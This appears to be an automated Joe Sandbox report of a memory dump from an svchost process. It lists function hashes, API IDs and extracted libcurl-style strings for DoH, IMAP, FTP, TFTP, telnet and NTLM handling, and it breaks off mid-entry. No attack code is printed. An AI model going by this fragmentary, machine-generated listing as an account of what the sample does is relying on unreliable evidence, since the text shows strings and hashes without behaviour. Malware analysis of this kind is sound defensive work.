                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_errnostrchr$_strdupmemchrstrncmpstrspnstrtoul
                                                                • String ID: /:#?!@{}[]\$'"^`*<>=;,+&()%$%ld$0123456789abcdefABCDEF:.
                                                                • API String ID: 985972941-4268014273
                                                                • Opcode ID: e3d73cfefcb2f60d8f79667ca9dc62befdb60d7681af33e1471cc1775cfbf69e
                                                                • Instruction ID: d1cb9227cff8c8603de75d1a14029aefb1bdaa90738980459cfe2d90ab1946a3
                                                                • Opcode Fuzzy Hash: e3d73cfefcb2f60d8f79667ca9dc62befdb60d7681af33e1471cc1775cfbf69e
                                                                • Instruction Fuzzy Hash: B7A1743920D7C082EA759BA5D5C43E9A2B5F785FC0F940125DE6E57B92FF38CA42A300
                                                                Function 00000173D01666B0 Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 380COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000000FF,?,00000000,00000000), ref: 00000173D0166D32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: %s%02x%02x$AAAA$CNAME: %s$Could not DoH-resolve: %s$DoH: %s type %s for %s$[DoH] A: %u.%u.%u.%u$[DoH] AAAA: $[DoH] TTL: %u seconds$[DoH] hostname: %s$bad error code$unknown
                                                                • API String ID: 1294909896-228328110
                                                                • Opcode ID: cae3ecc4de0a1b268117ea0853ca74b2cb80d8142f680d7d5b8044d2e1c96a63
                                                                • Instruction ID: 8dfc86a13182e70348bbce11e025d3ecd3534f15ed5765d8104c7cb2675ac714
                                                                • Opcode Fuzzy Hash: cae3ecc4de0a1b268117ea0853ca74b2cb80d8142f680d7d5b8044d2e1c96a63
                                                                • Instruction Fuzzy Hash: 3D028B7A60868086EB748FA5E8803DEB7B0F745FD4FD4411ADAAD47B95EB38C641E700
                                                                Function 00000173D01AC700 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 155libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProcmemset
                                                                • String ID: HTTP$RtlVerifyVersionInfo$ntdll
                                                                • API String ID: 2720349688-1320951699
                                                                • Opcode ID: d0e752bdb986d4987fb210704854cb6b8f50239dc797f64d43c63de54ecfa10d
                                                                • Instruction ID: 1bfe422880e3ad81287b0ecf32038e0066ce3c5933396ed638b884a82a26d460
                                                                • Opcode Fuzzy Hash: d0e752bdb986d4987fb210704854cb6b8f50239dc797f64d43c63de54ecfa10d
                                                                • Instruction Fuzzy Hash: 4851CD3A20C25086F7759BE5E8547EAF2B0B782FC4F840019D96E57B94FB79C606EB00
                                                                Function 00000173D01A53C0 Relevance: 27.7, APIs: 22, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c2cf571b473b600d14f1cf2488f9b52d1e09685eed8be68ba074785879acab16
                                                                • Instruction ID: 7c50610438670fc2d28e7da035e2b40c3330f488724b6a177ec1002caaec1ac1
                                                                • Opcode Fuzzy Hash: c2cf571b473b600d14f1cf2488f9b52d1e09685eed8be68ba074785879acab16
                                                                • Instruction Fuzzy Hash: 8D910039309A91A2E76C9BA1D6903EDE371F789FD0F800115EB7E43B51EF2492B29305
                                                                Function 00000173D0174440 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 296stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr$strtoul$memmove
                                                                • String ID: (non-permanent)$+$:%u$Added %.*s:%d:%s to DNS cache%s$Bad syntax CURLOPT_RESOLVE removal entry '%s'$Couldn't parse CURLOPT_RESOLVE entry '%s'$RESOLVE %.*s:%d - old addresses discarded$RESOLVE *:%d using wildcard$Resolve address '%s' found illegal
                                                                • API String ID: 505971213-3374123344
                                                                • Opcode ID: 40f4310ddc72b67cab9b23e124b017a3f2be94daedede76f050124a4f57fa09e
                                                                • Instruction ID: 2f724330102d7276bffa040990d239a3760aee5715931605e104b3469aad4ad1
                                                                • Opcode Fuzzy Hash: 40f4310ddc72b67cab9b23e124b017a3f2be94daedede76f050124a4f57fa09e
                                                                • Instruction Fuzzy Hash: 51C1AE792086D486EB319B91E4103EAA7B1F786FD4FD84125EA6D07BD5FB38C645E300
                                                                Function 00000173D016A6C0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 336COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: calloc
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 2635317215-2522224428
                                                                • Opcode ID: 30bb503f96ebc74696a1404ab859e9a8b275aa8c8f1bb45eb47a91bb64c19206
                                                                • Instruction ID: 9730e612749b383ba770a3aff8e195c2071525f33faa93fd7ddfc853f5035f14
                                                                • Opcode Fuzzy Hash: 30bb503f96ebc74696a1404ab859e9a8b275aa8c8f1bb45eb47a91bb64c19206
                                                                • Instruction Fuzzy Hash: F2E13B7A209B4086EB758B69E8403DDA7B5F744FD8FD80115CEAD07394EB39C999DB00
                                                                Function 00000173D017F650 Relevance: 24.3, APIs: 1, Strings: 15, Instructions: 336COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID: +$CAPABILITY$EXAMINE$EXPUNGE$FETCH$GETQUOTAROOT$LIST$LSUB$NOOP$PREA$SEARCH$SELECT$STORE$UID$Unexpected continuation response
                                                                • API String ID: 1475443563-2064110024
                                                                • Opcode ID: e19a0e671e1203be4e80fbf40ae6663f2b95bf59ab074aa4eed95155bcf1594c
                                                                • Instruction ID: 310eba573a2620212d9fffe784f4817890ccbd35e792c8932d929866b3dd13a1
                                                                • Opcode Fuzzy Hash: e19a0e671e1203be4e80fbf40ae6663f2b95bf59ab074aa4eed95155bcf1594c
                                                                • Instruction Fuzzy Hash: 66E1AC3A60C644C5FB758A96D1043EAF3B2A381FD8FC8401AC66D476D5FB69CB46B381
                                                                Function 00000173D0154360 Relevance: 24.2, APIs: 2, Strings: 14, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: $CONNECT responded chunked$CONNECT: fwd auth header '%s'$Connection:$Content-Length:$HTTP/1.$Ignoring Content-Length in CONNECT %03d response$Ignoring Transfer-Encoding in CONNECT %03d response$Proxy-Connection:$Proxy-authenticate:$Transfer-Encoding:$WWW-Authenticate:$chunked$close
                                                                • API String ID: 1294909896-1501247955
                                                                • Opcode ID: b5ce278b5ba784beb5d0bd0ff499b44304f26d4eff64a7c541cf6d0bb6d4c68e
                                                                • Instruction ID: f5aab1efb738ca02c75cdd31a183e88276e47b911cf6bf2a20df8db560dd3f1a
                                                                • Opcode Fuzzy Hash: b5ce278b5ba784beb5d0bd0ff499b44304f26d4eff64a7c541cf6d0bb6d4c68e
                                                                • Instruction Fuzzy Hash: F171807921829496FB34DB96E5947E9A771A342FC8FC44012D97E0BB85FB78C309A701
                                                                Function 00000173D01A5720 Relevance: 22.6, APIs: 18, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ea893b04b6395d67d000b634847ae42eb734c70cfd45d7d6b81926d0d54aead7
                                                                • Instruction ID: 7e2525cb039c52db42b05a1ed5e838b5b28ef55d010004f46f8eb6566b21c120
                                                                • Opcode Fuzzy Hash: ea893b04b6395d67d000b634847ae42eb734c70cfd45d7d6b81926d0d54aead7
                                                                • Instruction Fuzzy Hash: AB41C43A209F919AE6989F65EA9439CB3B4F789BA0F444105CF7E43310EF34E1B59710
                                                                Function 00000173D01AD5E0 Relevance: 19.7, APIs: 9, Strings: 4, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: DIGEST-MD5 handshake failure (empty challenge message)$SSPI: could not get auth info$WDigest$schannel: InitializeSecurityContext failed: %s
                                                                • API String ID: 1294909896-508395639
                                                                • Opcode ID: 5956d99175cbb9ad2bfaf52e5a060276d7ef3c07d118a9b35e6df26b4ac68c94
                                                                • Instruction ID: 650e27f13acf5502d927ca219e43411058866d83a8f06e9b217bf3b5c7235bed
                                                                • Opcode Fuzzy Hash: 5956d99175cbb9ad2bfaf52e5a060276d7ef3c07d118a9b35e6df26b4ac68c94
                                                                • Instruction Fuzzy Hash: 2EA1497A608B9486EB249BA5E8543DEA3B4F749FC8F800015DE6E17B54FF38C646E740
                                                                Function 00000173D01A06D0 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 223stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr
                                                                • String ID: BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                                                • API String ID: 2830005266-1232391404
                                                                • Opcode ID: c42a3dfb4a370017086041794bb8443a61c44bf4fb67fd2a3ce2e314f3e46a1c
                                                                • Instruction ID: 9e6171a54f7f1ffd886c340b65d520508fdf00f8c01f5c291960c939cf2d56f5
                                                                • Opcode Fuzzy Hash: c42a3dfb4a370017086041794bb8443a61c44bf4fb67fd2a3ce2e314f3e46a1c
                                                                • Instruction Fuzzy Hash: 1DA1AA3A60C78181FA768FA1E4543EEA3B0F745FC4F8481259ABE57285EF39C706A740
                                                                Function 00000173D01A3710 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 212networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: sendto$ErrorLast
                                                                • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                                                • API String ID: 4042023021-2715966420
                                                                • Opcode ID: 8a87e8774f9027f0560b17bcd9566997fc2b4c4cbcb327f0ac8111370436c656
                                                                • Instruction ID: 78f8088c101d14216e8bb0dd021cbb0c66c2ff8e9766e895c45cc394cd0a731d
                                                                • Opcode Fuzzy Hash: 8a87e8774f9027f0560b17bcd9566997fc2b4c4cbcb327f0ac8111370436c656
                                                                • Instruction Fuzzy Hash: 17A17B7A20869086E771CF65D4407E9B7B0F389FC8F884026EE5E8B758EB38C645D750
                                                                Function 00000173D017E330 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_vfwprintf_l
                                                                • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
                                                                • API String ID: 1355092213-3948863929
                                                                • Opcode ID: 1e5f55f230b8fbdbafccd35637d684bdb75166447e780192e33be56830b6f351
                                                                • Instruction ID: 9491e11cd5d6b5c1229649b21122b7ba4515ac14ad1ebfa2bcb896679e261dec
                                                                • Opcode Fuzzy Hash: 1e5f55f230b8fbdbafccd35637d684bdb75166447e780192e33be56830b6f351
                                                                • Instruction Fuzzy Hash: 76814A3A309B8581EA20CB95E8847DAA7F0F799BC4F800126EA9D47B55FF38C645D740
                                                                Function 00000173D016C630 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Accept timeout occurred while waiting server connect$Checking for server connect$Ctrl conn has data while waiting for data conn$Error while waiting for server connect$FTP code: %03d$Got 226 before data activity$Ready to accept data connection from server$There is negative response in cache while serv connect
                                                                • API String ID: 0-817362717
                                                                • Opcode ID: 3cf1106be62ad4aa77d014c2d57acf1851cf7790d9541708fa7bc9c69d88be28
                                                                • Instruction ID: 503cd5362444797fc98f3391426d02d86d571c4a27c884c3b5587b67c6b9a9b7
                                                                • Opcode Fuzzy Hash: 3cf1106be62ad4aa77d014c2d57acf1851cf7790d9541708fa7bc9c69d88be28
                                                                • Instruction Fuzzy Hash: D051B67A70869045FA72DBAAE9503ED93619785BE4FC44021DE2C477D6EB38CA829700
                                                                Function 00000173D01A4360 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$calloc
                                                                • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM
                                                                • API String ID: 3095843317-2127885284
                                                                • Opcode ID: 17838d9634a2369f2acdfbf23771de2f22ce04b96826ad6d8c52dd4c0fc01954
                                                                • Instruction ID: aff659871b28452787cdf2b4b8f458cc09d4d6cb26503850b7c0c989de161206
                                                                • Opcode Fuzzy Hash: 17838d9634a2369f2acdfbf23771de2f22ce04b96826ad6d8c52dd4c0fc01954
                                                                • Instruction Fuzzy Hash: 41A18A3A309A90A7EB6C9BA5D2903E9B7B0F789BC0F840015DB7D47781EF24D6729300
                                                                Function 00000173D0178608 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr$free
                                                                • String ID: HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Negotiate: noauthpersist -> %d, header part: %s$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$close$false$keep-alive
                                                                • API String ID: 3578582447-3982183773
                                                                • Opcode ID: 5400510bd5f16d79d403d8360efa22d2f07bb3401bc8769d45e40be599913d11
                                                                • Instruction ID: 4dcf815fea7e5b2eced6927b4fe828e26ff3c718d67876bd2da6c08bb336d9f1
                                                                • Opcode Fuzzy Hash: 5400510bd5f16d79d403d8360efa22d2f07bb3401bc8769d45e40be599913d11
                                                                • Instruction Fuzzy Hash: 83516A3834C640C5FA759BA6D9543E9D2B1D786FC6FC400119A2E0BAD6FB68C785E702
                                                                Function 00000173D01B4320 Relevance: 15.0, APIs: 12, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 10e6199a7fed04eb3a9103f1f10943f543e8970542787782a8ffd54347bddaee
                                                                • Instruction ID: 1858d2acf49c809234d6cf24a208e8de7c2547216ba6fa4edc27cbcdf3c3eee4
                                                                • Opcode Fuzzy Hash: 10e6199a7fed04eb3a9103f1f10943f543e8970542787782a8ffd54347bddaee
                                                                • Instruction Fuzzy Hash: C5217A3A109F1182E7609F69E9D426CB3B8FB8DFA9F500205CE6E42718EF34C5A6D751
                                                                Function 00000173D016A7A3 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 236COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 2653869212-2522224428
                                                                • Opcode ID: 709b11ccf052b55cd202305e6cbd407866a447e216ba33172544a202e0303097
                                                                • Instruction ID: 69864e71a8c49087da965bc4105dc7f8801921275da64386cfe58e9193b103af
                                                                • Opcode Fuzzy Hash: 709b11ccf052b55cd202305e6cbd407866a447e216ba33172544a202e0303097
                                                                • Instruction Fuzzy Hash: B4B12B7A209B4486EB758B69D8403EDA7F5E704FD8FD80215CEAD06394FB39C958EB00
                                                                Function 00000173D016A803 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 234COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 0-2522224428
                                                                • Opcode ID: 7a8e5cfe7a1db2edb1b6a494e2eb3a7716bf34f0730d2bffec29c10d8b21fb3e
